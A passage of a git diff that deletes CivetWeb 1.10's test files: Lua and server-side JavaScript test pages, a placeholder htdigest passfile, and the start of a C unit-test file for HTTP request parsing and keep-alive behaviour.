-"url_rewrite_patterns",
-"hide_files_patterns",
-"request_timeout_ms",
-"websocket_timeout_ms",
-"decode_url",
-"lua_preload_file",
-"lua_script_pattern",
-"lua_server_page_pattern",
-"_experimental_duktape_script_pattern",
-"websocket_root",
-"lua_websocket_pattern",
-"access_control_allow_origin",
-"error_pages",
-"_unknown__option"
-]
-
-// send a header
-print('HTTP/1.0 200 OK\r\n');
-print('Content-Type: text/html\r\n');
-print('\r\n');
-
-print("<html><body>\n");
-print("<p>This example page is generated by the ");
-print('<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>');
-print(" with server side javascript.</p>\n");
-
-for (var i=0; i < opts.length; i++) {
-  var o = opts[i];
-  var n = civetweb.getoption(o);
-  if (typeof(n) == "string") {
-    print("<p>Option " + o + " = " + n + "</p>\n");
-  } else {
-    print("<p>Option " + o + " not known</p>\n");
-  }
-}
-
-print("</body></html>\n");
diff --git a/thirdparty/civetweb-1.10/test/page3a.lp b/thirdparty/civetweb-1.10/test/page3a.lp
deleted file mode 100644
index 1595aa5..0000000
--- a/thirdparty/civetweb-1.10/test/page3a.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "test/page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"abs\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "abs")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3r.lp b/thirdparty/civetweb-1.10/test/page3r.lp
deleted file mode 100644
index e849cfc..0000000
--- a/thirdparty/civetweb-1.10/test/page3r.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"rel\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "rel")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3v.lp b/thirdparty/civetweb-1.10/test/page3v.lp
deleted file mode 100644
index 5f81126..0000000
--- a/thirdparty/civetweb-1.10/test/page3v.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"virtual\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "virtual")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page4.lua b/thirdparty/civetweb-1.10/test/page4.lua
deleted file mode 100644
index e2b84d7..0000000
--- a/thirdparty/civetweb-1.10/test/page4.lua
+++ /dev/null
@@ -1,180 +0,0 @@
--- This test checks the Lua functions:

--- get_var, get_cookie, md5, url_encode

-

-now = os.time()

-cookie_name = "civetweb-test-page4"

-

-if mg.request_info.http_headers.Cookie then

-   cookie_value = tonumber(mg.get_cookie(mg.request_info.http_headers.Cookie, cookie_name))

-end

-

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-if not cookie_value then

-    mg.write("Set-Cookie: " .. cookie_name .. "=" .. tostring(now) .. "\r\n")

-end

-mg.write("\r\n")

-

-mg.write("<html>\r\n<head><title>Civetweb Lua script test page 4</title></head>\r\n<body>\r\n")

-mg.write("<p>Test of Civetweb Lua Functions:</p>\r\n");

-mg.write("<pre>\r\n");

-

--- get_var of query_string

-mg.write("get_var test (check query string):\r\n")

-if not mg.request_info.query_string then

-    mg.write("  No query string. You may try <a href='?a=a1&amp;junk&amp;b=b2&amp;cc=cNotSet&amp;d=a, b and d should be set&amp;z=z'>this example</a>.\r\n")

-else

-    for _,var in ipairs({'a','b','c','d'}) do

-       value = mg.get_var(mg.request_info.query_string, var);

-       if value then

-         mg.write("  Variable " .. var .. ": value " .. value .. "\r\n");

-       else

-         mg.write("  Variable " .. var .. " not set\r\n");

-       end

-    end

-end

-mg.write("\r\n")

-

--- md5

-mg.write("MD5 test:\r\n")

-test_string = "abcd\0efgh"

-mg.write("  String with embedded 0, length " .. string.len(test_string))

-test_md5 = mg.md5(test_string)

-mg.write(", MD5 " .. test_md5 .. "\r\n")

-if mg.md5("") == "d41d8cd98f00b204e9800998ecf8427e" then

-    mg.write("  MD5 of empty string OK\r\n")

-else

-    mg.write("  Error: MD5 of empty string NOT OK\r\n")

-end

-if mg.md5("The quick brown fox jumps over the lazy dog.") == "e4d909c290d0fb1ca068ffaddf22cbd0" then

-    mg.write("  MD5 of test string OK\r\n")

-else

-    mg.write("  Error: MD5 of test string NOT OK\r\n")

-end

-mg.write("\r\n")

-

--- get_cookie

-mg.write("Cookie test:\r\n")

-if not cookie_value then

-    mg.write("  Cookie not set yet. Please reload the page.\r\n")

-else

-    mg.write("  Cookie set to " .. cookie_value .. "\r\n")

-    mg.write("  You visited this page " .. os.difftime(now, cookie_value) .. " seconds before.\r\n")

-end

-mg.write("\r\n")

-

--- test 'require' of other Lua scripts

-mg.write("require test\r\n")

-script_path = mg.script_name:match("(.*)page%d*.lua")

-if type(script_path)=='string' then

-    package.path = script_path .. "?.lua;" .. package.path

-    mg.write("  Lua search path: " .. package.path .. "\r\n")

-    require "html_esc"

-    require "require_test"

-    if htmlEscape then

-      for i=0,15 do

-        mg.write("  ")

-        for j=0,15 do

-            mg.write(tostring(htmlEscape[16*i+j]))

-        end

-        mg.write("\r\n")

-      end

-    else

-      mg.write("  'require' test failed (htmlEscape)\r\n")

-    end

-    if HugeText then

-      mg.write("\r\n")

-      local ht = HugeText(os.date("%a %b. %d"))

-      for i=1,#ht do

-        mg.write("  " .. ht[i] .. "\r\n")

-      end

-    else

-      mg.write("  'require' test failed (HugeText)\r\n")

-    end

-else

-    mg.write("  name match failed\r\n")

-end

-mg.write("\r\n")

-

--- test get_response_code_text

-mg.write("HTTP helper methods test:\r\n")

-if (htmlEscape("<a b & c d>") == "&lt;a b &amp; c d&gt;") then

-    mg.write("  htmlEscape test OK\r\n")

-else

-    mg.write("  Error: htmlEscape test NOT OK\r\n")

-end

-if (mg.get_response_code_text(200) == "OK") then

-    mg.write("  get_response_code_text test OK\r\n")

-else

-    mg.write("  Error: get_response_code_text test NOT OK\r\n")

-end

-mg.write("\r\n")

-

--- url_encode

-mg.write("URL encode/decode test:\r\n")

-if mg.url_encode("") == "" then

-    mg.write("  url_encode of empty string OK\r\n")

-else

-    mg.write("  Error: url_encode of empty string NOT OK\r\n")

-end

-raw_string = [[ !"#$%&'()*+,-./0123456789:;<=>?@]]

-mg.write("  original string: " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.url_encode(raw_string):upper()

-ref_string = "%20!%22%23%24%25%26'()*%2B%2C-.%2F0123456789%3A%3B%3C%3D%3E%3F%40" -- from http://www.w3schools.com/tags/ref_urlencode.asp

-mg.write("  mg-url:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference url: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string)

-dec_ref_string = mg.url_decode(ref_string)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string, false)

-dec_ref_string = mg.url_decode(ref_string, false)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string, true)

-dec_ref_string = mg.url_decode(ref_string, true)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-

--- base64_encode

-mg.write("BASE64 encode/decode test:\r\n")

-raw_string = [[ !"#$%&'()*+,-./0123456789:;<=>?@]]

-mg.write("  original string:  " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.base64_encode(raw_string)

-ref_string = "ICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9A" -- from http://www.base64encode.org/

-mg.write("  mg-base64:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference base64: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.base64_decode(mg_string)

-dec_ref_string = mg.base64_decode(ref_string)

-mg.write("  decoded mg-base64:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference base64: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-raw_string = [[<?> -?-]]

-mg.write("  original string:  " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.base64_encode(raw_string)

-ref_string = "PD8+IC0/LQ==" -- from http://www.base64encode.org/

-mg.write("  mg-base64:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference base64: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.base64_decode(mg_string)

-dec_ref_string = mg.base64_decode(ref_string)

-mg.write("  decoded mg-base64:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference base64: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-

--- random

-mg.write("Random numbers:\r\n")

-for i=1,10 do mg.write(string.format("%18u\r\n", mg.random())) end

-mg.write("\r\n")

-

--- uuid

-if mg.uuid then

-mg.write("UUIDs:\r\n")

-for i=1,10 do mg.write(string.format("%40s\r\n", mg.uuid())) end

-mg.write("\r\n")

-end

-

--- end of page

-mg.write("</pre>\r\n</body>\r\n</html>\r\n")

diff --git a/thirdparty/civetweb-1.10/test/page5.lua b/thirdparty/civetweb-1.10/test/page5.lua
deleted file mode 100644
index dcf7f9f..0000000
--- a/thirdparty/civetweb-1.10/test/page5.lua
+++ /dev/null
@@ -1,8 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body><p>

-Hello world!

-</p>

-</body></html>

-]])

diff --git a/thirdparty/civetweb-1.10/test/page6.lua b/thirdparty/civetweb-1.10/test/page6.lua
deleted file mode 100644
index dc30439..0000000
--- a/thirdparty/civetweb-1.10/test/page6.lua
+++ /dev/null
@@ -1,16 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")
-mg.write("Content-Type: text/plain\r\n")
-mg.write("\r\n")
-mg.write(mg.request_info.request_method .. " " .. mg.request_info.request_uri .. "  HTTP/" .. mg.request_info.http_version .. "\r\n")
-for k,v in pairs(mg.request_info.http_headers) do
-  mg.write(k .. ": " .. v .. "\r\n")
-end
-mg.write("\r\n")
-
-repeat
-  local r = mg.read()
-  if (r) then
-    mg.write(r)
-  end
-until not r
-
diff --git a/thirdparty/civetweb-1.10/test/page_keep_alive.lua b/thirdparty/civetweb-1.10/test/page_keep_alive.lua
deleted file mode 100644
index d869ce4..0000000
--- a/thirdparty/civetweb-1.10/test/page_keep_alive.lua
+++ /dev/null
@@ -1,34 +0,0 @@
--- Set keep_alive. The return value specifies if this is possible at all.
-canKeepAlive = mg.keep_alive(true)
-
-if canKeepAlive then
-    -- Create the entire response in a string variable first. Content-Length will be set to the length of this string.
-    reply = [[
-        <html><body>
-        <p>This is a Lua script supporting html keep-alive with the 
-        <a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-        </p>
-        <p>It works by setting the Content-Length header field properly.
-        </body></html>
-    ]]
-else
-    reply = "<html><body>Keep alive not possible!</body></html>"
-end
-
--- First send the http headers
-mg.write("HTTP/1.1 200 OK\r\n")
-mg.write("Content-Type: text/html\r\n")
-mg.write("Date: " .. os.date("!%a, %d %b %Y %H:%M:%S") .. " GMT\r\n")
-mg.write("Cache-Control: no-cache\r\n")
-
-if canKeepAlive then
-    mg.write("Content-Length: " .. tostring(string.len(reply)) .. "\r\n")
-    mg.write("Connection: keep-alive\r\n")
-else
-    mg.write("Connection: close\r\n")
-end
-mg.write("\r\n")
-
--- Finally send the content
-mg.write(reply)
-
diff --git a/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua b/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua
deleted file mode 100644
index 28ac7d1..0000000
--- a/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua
+++ /dev/null
@@ -1,66 +0,0 @@
--- Set keep_alive. The return value specifies if this is possible at all.
-canKeepAlive = mg.keep_alive(true)
-now = os.date("!%a, %d %b %Y %H:%M:%S")
-
--- First send the http headers
-mg.write("HTTP/1.1 200 OK\r\n")
-mg.write("Content-Type: text/html\r\n")
-mg.write("Date: " .. now .. " GMT\r\n")
-mg.write("Cache-Control: no-cache\r\n")
-mg.write("Last-Modified: " .. now .. " GMT\r\n")
-if not canKeepAlive then
-    mg.write("Connection: close\r\n")
-    mg.write("\r\n")
-    mg.write("<html><body>Keep alive not possible!</body></html>")
-    return
-end
-if mg.request_info.http_version ~= "1.1" then
-    -- wget will use HTTP/1.0 and Connection: keep-alive, so chunked transfer is not possible
-    mg.write("Connection: close\r\n")
-    mg.write("\r\n")
-    mg.write("<html><body>Chunked transfer is only possible for HTTP/1.1 requests!</body></html>")
-    mg.keep_alive(false)
-    return
-end
-
--- use chunked encoding (http://www.jmarshall.com/easy/http/#http1.1c2)
-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")
---mg.write("Cache-Control: no-cache\r\n")
---mg.write("Cache-Control: no-store\r\n")
-mg.write("Connection: keep-alive\r\n")
-mg.write("Transfer-Encoding: chunked\r\n")
-mg.write("\r\n")
-
--- function to send a chunk
-function send(str)
-    local len = string.len(str)
-    mg.write(string.format("%x\r\n", len))
-    mg.write(str.."\r\n")
-end
-
--- send the chunks
-send("<html>")
-send("<head><title>Civetweb Lua script chunked transfer test page</title></head>")
-send("<body>\n")
-
-fileCnt = 0
-if lfs then
-    send("Files in " .. lfs.currentdir())
-    send('\n<table border="1">\n')
-    send('<tr><th>name</th><th>type</th><th>size</th></tr>\n')
-    for f in lfs.dir(".") do
-        local at = lfs.attributes(f);
-        if at then
-          send('<tr><td>' .. f .. '</td><td>' .. at.mode .. '</td><td>' .. at.size .. '</td></tr>\n')
-        end
-        fileCnt = fileCnt + 1
-    end
-    send("</table>\n")
-end
-
-send(fileCnt .. " entries (" .. now .. " GMT)\n")
-send("</body>")
-send("</html>")
-
--- end
-send("")
diff --git a/thirdparty/civetweb-1.10/test/page_status.lua b/thirdparty/civetweb-1.10/test/page_status.lua
deleted file mode 100644
index 3c9b0eb..0000000
--- a/thirdparty/civetweb-1.10/test/page_status.lua
+++ /dev/null
@@ -1,38 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-

--- MIME type: https://www.ietf.org/rfc/rfc4627.txt, chapter 6

-mg.write("Content-Type: application/json\r\n")

-

-mg.write("\r\n")

-

-num_threads = mg.get_option("num_threads")

-num_threads = tonumber(num_threads)

-

-

-function n(s) 

-  if ((type(s) == "string") and (#s > 0)) then 

-    return s 

-  else 

-    return "null" 

-  end

-end

-

-

-mg.write("{\r\n\"system\" :\r\n")

-

-mg.write(n(mg.get_info("system")))

-

-mg.write(",\r\n\"summary\" :\r\n")

-mg.write(n(mg.get_info("context")))

-mg.write(",\r\n\"common\" :\r\n")

-mg.write(n(mg.get_info("common")))

-mg.write(",\r\n\"connections\" :\r\n[\r\n")

-

-  mg.write(n(mg.get_info("connection", 1)))

-

-for i=2,num_threads do

-  mg.write(",\r\n")

-  mg.write(n(mg.get_info("connection", i)))

-end

-mg.write("]\r\n}\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/passfile b/thirdparty/civetweb-1.10/test/passfile
deleted file mode 100644
index 58c313a..0000000
--- a/thirdparty/civetweb-1.10/test/passfile
+++ /dev/null
@@ -1,3 +0,0 @@
-guest:mydomain.com:485264dcc977a1925370b89d516a1477
-Administrator:mydomain.com:e32daa3028eba04dc53e2d781e6fc983
-
diff --git a/thirdparty/civetweb-1.10/test/prime.ssjs b/thirdparty/civetweb-1.10/test/prime.ssjs
deleted file mode 100644
index 6dc3243..0000000
--- a/thirdparty/civetweb-1.10/test/prime.ssjs
+++ /dev/null
@@ -1,36 +0,0 @@
-// prime.js

-

-// Pure Ecmascript version of low level helper

-function primeCheckEcmascript(val, limit) {

-    for (var i = 2; i <= limit; i++) {

-        if ((val % i) == 0) { return false; }

-    }

-    return true;

-}

-

-// Select available helper at load time

-var primeCheckHelper = (this.primeCheckNative || primeCheckEcmascript);

-

-// Check 'val' for primality

-function primeCheck(val) {

-    if (val == 1 || val == 2) { return true; }

-    var limit = Math.ceil(Math.sqrt(val));

-    while (limit * limit < val) { limit += 1; }

-    return primeCheckHelper(val, limit);

-}

-

-function primeTest() {

-    var res = [];

-

-    print('Have native helper: ' + (primeCheckHelper !== primeCheckEcmascript) + '\n');

-    for (var i = 2; i <= 1000; i++) {

-        if (primeCheck(i)) { res.push(i); }

-    } 

-    print(res.join(' '));

-}

-

-print = this.send || conn.write

-

-print('HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n');

-

-primeTest();

diff --git a/thirdparty/civetweb-1.10/test/private.c b/thirdparty/civetweb-1.10/test/private.c
deleted file mode 100644
index 9b34f59..0000000
--- a/thirdparty/civetweb-1.10/test/private.c
+++ /dev/null
@@ -1,1018 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#define CIVETWEB_API static
-#endif
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-#undef MEMORY_DEBUGGING
-#endif
-
-#include "../src/civetweb.c"
-
-#include <stdlib.h>
-#include <time.h>
-
-#include "private.h"
-
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-static char tmp_parse_buffer[1024];
-
-static int
-test_parse_http_response(char *buf, int len, struct mg_response_info *ri)
-{
-	ck_assert_int_lt(len, (int)sizeof(tmp_parse_buffer));
-	memcpy(tmp_parse_buffer, buf, (size_t)len);
-	return parse_http_response(tmp_parse_buffer, len, ri);
-}
-
-static int
-test_parse_http_request(char *buf, int len, struct mg_request_info *ri)
-{
-	ck_assert_int_lt(len, (int)sizeof(tmp_parse_buffer));
-	memcpy(tmp_parse_buffer, buf, (size_t)len);
-	return parse_http_request(tmp_parse_buffer, len, ri);
-}
-
-
-START_TEST(test_parse_http_message)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct mg_request_info ri;
-	struct mg_response_info respi;
-	char empty[] = "";
-	char space[] = " \x00";
-	char req1[] = "GET / HTTP/1.1\r\n\r\n";
-	char req2[] = "BLAH / HTTP/1.1\r\n\r\n";
-	char req3[] = "GET / HTTP/1.1\nKey: Val\n\n";
-	char req4[] =
-	    "GET / HTTP/1.1\r\nA: foo bar\r\nB: bar\r\nskip\r\nbaz:\r\n\r\n";
-	char req5[] = "GET / HTTP/1.0\n\n";
-	char req6[] = "G";
-	char req7[] = " blah ";
-	char req8[] = "HTTP/1.0 404 Not Found\n\n";
-	char req9[] = "HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n";
-
-	char req10[] = "GET / HTTP/1.1\r\nA: foo bar\r\nB: bar\r\n\r\n";
-
-	char req11[] = "GET /\r\nError: X\r\n\r\n";
-
-	char req12[] =
-	    "POST /a/b/c.d?e=f&g HTTP/1.1\r\nKey1: val1\r\nKey2: val2\r\n\r\nBODY";
-
-
-	int lenreq1 = (int)strlen(req1);
-	int lenreq2 = (int)strlen(req2);
-	int lenreq3 = (int)strlen(req3);
-	int lenreq4 = (int)strlen(req4);
-	int lenreq5 = (int)strlen(req5);
-	int lenreq6 = (int)strlen(req6);
-	int lenreq7 = (int)strlen(req7);
-	int lenreq8 = (int)strlen(req8);
-	int lenreq9 = (int)strlen(req9);
-	int lenreq10 = (int)strlen(req10);
-	int lenreq11 = (int)strlen(req11);
-	int lenreq12 = (int)strlen(req12);
-	int lenhdr12 = lenreq12 - 4; /* length without body */
-
-	mark_point();
-
-	/* An empty string is neither a complete request nor a complete
-	 * response, so it must return 0 */
-	ck_assert_int_eq(0, get_http_header_len(empty, 0));
-	ck_assert_int_eq(0, test_parse_http_request(empty, 0, &ri));
-	ck_assert_int_eq(0, test_parse_http_response(empty, 0, &respi));
-
-	/* Same is true for a leading space */
-	ck_assert_int_eq(0, get_http_header_len(space, 1));
-	ck_assert_int_eq(0, test_parse_http_request(space, 1, &ri));
-	ck_assert_int_eq(0, test_parse_http_response(space, 1, &respi));
-
-	/* But a control character (like 0) makes it invalid */
-	ck_assert_int_eq(-1, get_http_header_len(space, 2));
-	ck_assert_int_eq(-1, test_parse_http_request(space, 2, &ri));
-	ck_assert_int_eq(-1, test_parse_http_response(space, 2, &respi));
-
-
-	/* req1 minus 1 byte at the end is incomplete */
-	ck_assert_int_eq(0, get_http_header_len(req1, lenreq1 - 1));
-
-
-	/* req1 minus 1 byte at the start is complete but invalid */
-	ck_assert_int_eq(lenreq1 - 1, get_http_header_len(req1 + 1, lenreq1 - 1));
-	ck_assert_int_eq(-1, test_parse_http_request(req1 + 1, lenreq1 - 1, &ri));
-
-
-	/* req1 is a valid request */
-	ck_assert_int_eq(lenreq1, get_http_header_len(req1, lenreq1));
-	ck_assert_int_eq(-1, test_parse_http_response(req1, lenreq1, &respi));
-	ck_assert_int_eq(lenreq1, test_parse_http_request(req1, lenreq1, &ri));
-	ck_assert_str_eq("1.1", ri.http_version);
-	ck_assert_int_eq(0, ri.num_headers);
-
-
-	/* req2 is a complete, but invalid request */
-	ck_assert_int_eq(lenreq2, get_http_header_len(req2, lenreq2));
-	ck_assert_int_eq(-1, test_parse_http_request(req2, lenreq2, &ri));
-
-
-	/* req3 is a complete and valid request */
-	ck_assert_int_eq(lenreq3, get_http_header_len(req3, lenreq3));
-	ck_assert_int_eq(lenreq3, test_parse_http_request(req3, lenreq3, &ri));
-	ck_assert_int_eq(-1, test_parse_http_response(req3, lenreq3, &respi));
-
-
-	/* Multiline header are obsolete, so return an error
-	 * (https://tools.ietf.org/html/rfc7230#section-3.2.4). */
-	ck_assert_int_eq(-1, test_parse_http_request(req4, lenreq4, &ri));
-
-
-	/* req5 is a complete and valid request (also somewhat malformed,
-	 * since it uses \n\n instead of \r\n\r\n) */
-	ck_assert_int_eq(lenreq5, get_http_header_len(req5, lenreq5));
-	ck_assert_int_eq(-1, test_parse_http_response(req5, lenreq5, &respi));
-	ck_assert_int_eq(lenreq5, test_parse_http_request(req5, lenreq5, &ri));
-	ck_assert_str_eq("GET", ri.request_method);
-	ck_assert_str_eq("1.0", ri.http_version);
-
-
-	/* req6 is incomplete */
-	ck_assert_int_eq(0, get_http_header_len(req6, lenreq6));
-	ck_assert_int_eq(0, test_parse_http_request(req6, lenreq6, &ri));
-
-
-	/* req7 is invalid, but not yet complete */
-	ck_assert_int_eq(0, get_http_header_len(req7, lenreq7));
-	ck_assert_int_eq(0, test_parse_http_request(req7, lenreq7, &ri));
-
-
-	/* req8 is a valid response */
-	ck_assert_int_eq(lenreq8, get_http_header_len(req8, lenreq8));
-	ck_assert_int_eq(-1, test_parse_http_request(req8, lenreq8, &ri));
-	ck_assert_int_eq(lenreq8, test_parse_http_response(req8, lenreq8, &respi));
-
-
-	/* req9 is a valid response */
-	ck_assert_int_eq(lenreq9, get_http_header_len(req9, lenreq9));
-	ck_assert_int_eq(-1, test_parse_http_request(req9, lenreq9, &ri));
-	ck_assert_int_eq(lenreq9, test_parse_http_response(req9, lenreq9, &respi));
-	ck_assert_int_eq(1, respi.num_headers);
-
-
-	/* req10 is a valid request */
-	ck_assert_int_eq(lenreq10, get_http_header_len(req10, lenreq10));
-	ck_assert_int_eq(lenreq10, test_parse_http_request(req10, lenreq10, &ri));
-	ck_assert_str_eq("1.1", ri.http_version);
-	ck_assert_int_eq(2, ri.num_headers);
-	ck_assert_str_eq("A", ri.http_headers[0].name);
-	ck_assert_str_eq("foo bar", ri.http_headers[0].value);
-	ck_assert_str_eq("B", ri.http_headers[1].name);
-	ck_assert_str_eq("bar", ri.http_headers[1].value);
-
-
-	/* req11 is a complete but valid request */
-	ck_assert_int_eq(-1, test_parse_http_request(req11, lenreq11, &ri));
-
-
-	/* req12 is a valid request with body data */
-	ck_assert_int_gt(lenreq12, lenhdr12);
-	ck_assert_int_eq(lenhdr12, get_http_header_len(req12, lenreq12));
-	ck_assert_int_eq(lenhdr12, test_parse_http_request(req12, lenreq12, &ri));
-}
-END_TEST
-
-
-START_TEST(test_should_keep_alive)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct mg_connection conn;
-	struct mg_context ctx;
-	char req1[] = "GET / HTTP/1.1\r\n\r\n";
-	char req2[] = "GET / HTTP/1.0\r\n\r\n";
-	char req3[] = "GET / HTTP/1.1\r\nConnection: close\r\n\r\n";
-	char req4[] = "GET / HTTP/1.1\r\nConnection: keep-alive\r\n\r\n";
-	char yes[] = "yes";
-	char no[] = "no";
-
-	int lenreq1 = (int)strlen(req1);
-	int lenreq2 = (int)strlen(req2);
-	int lenreq3 = (int)strlen(req3);
-	int lenreq4 = (int)strlen(req4);
-
-	mark_point();
-
-	memset(&ctx, 0, sizeof(ctx));
-	memset(&conn, 0, sizeof(conn));
-	conn.ctx = &ctx;
-	ck_assert_int_eq(test_parse_http_request(req1, lenreq1, &conn.request_info),
-	                 lenreq1);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 0);
-
-	ctx.config[ENABLE_KEEP_ALIVE] = no;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	ctx.config[ENABLE_KEEP_ALIVE] = yes;
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.must_close = 1;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	conn.must_close = 0;
-	test_parse_http_request(req2, lenreq2, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 0);
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	test_parse_http_request(req3, lenreq3, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 1);
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	test_parse_http_request(req4, lenreq4, &conn.request_info);
-	conn.connection_type = 1; /* Valid request */
-	ck_assert_int_eq(conn.request_info.num_headers, 1);
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.status_code = 200;
-	conn.must_close = 1;
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-
-	conn.status_code = 200;
-	conn.must_close = 0;
-	ck_assert_int_eq(should_keep_alive(&conn), 1);
-
-	conn.status_code = 200;
-	conn.must_close = 0;
-	conn.connection_type = 0; /* invalid */
-	ck_assert_int_eq(should_keep_alive(&conn), 0);
-}
-END_TEST
-
-
-START_TEST(test_match_prefix)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	ck_assert_int_eq(4, match_prefix("/api", 4, "/api"));
-	ck_assert_int_eq(3, match_prefix("/a/", 3, "/a/b/c"));
-	ck_assert_int_eq(-1, match_prefix("/a/", 3, "/ab/c"));
-	ck_assert_int_eq(4, match_prefix("/*/", 3, "/ab/c"));
-	ck_assert_int_eq(6, match_prefix("**", 2, "/a/b/c"));
-	ck_assert_int_eq(2, match_prefix("/*", 2, "/a/b/c"));
-	ck_assert_int_eq(2, match_prefix("*/*", 3, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/", 3, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**.foo|**.bar", 13, "a.bar"));
